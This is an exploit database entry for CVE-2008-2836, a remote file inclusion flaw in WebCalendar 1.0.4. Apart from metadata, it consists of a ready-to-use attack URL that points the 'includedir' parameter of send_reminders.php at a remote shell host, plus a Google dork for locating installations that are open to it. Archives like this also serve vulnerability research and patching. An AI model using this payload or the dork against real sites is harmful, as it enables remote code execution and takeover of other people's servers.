WebCalendar 1.0.4 - 'includedir' Remote File Inclusion

Author: Cr@zy_King
type: webapps
platform: php
port: 
date_added: 2008-06-16  
date_updated: 2016-12-09  
verified: 1  
codes: OSVDB-46500;CVE-2008-2836  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comWebCalendar-1.0.4.zip  

raw file: 5847.txt  
Cr@zy_King :\ BiyoSecurity Team

WebCalendar v1.0.4 Remote Fıle Include

Demo - Down : http://webcalendar.sourceforge.net/

http://localhost/patch/tools/send_reminders.php?noSet=0&includedir=http://sheLLz?

Google Dork : "WebCalendar v1.0.4"

                           www.biyosecurity.com

Greatz : aLL My Friend'Z & nETKILLER

# milw0rm.com [2008-06-17]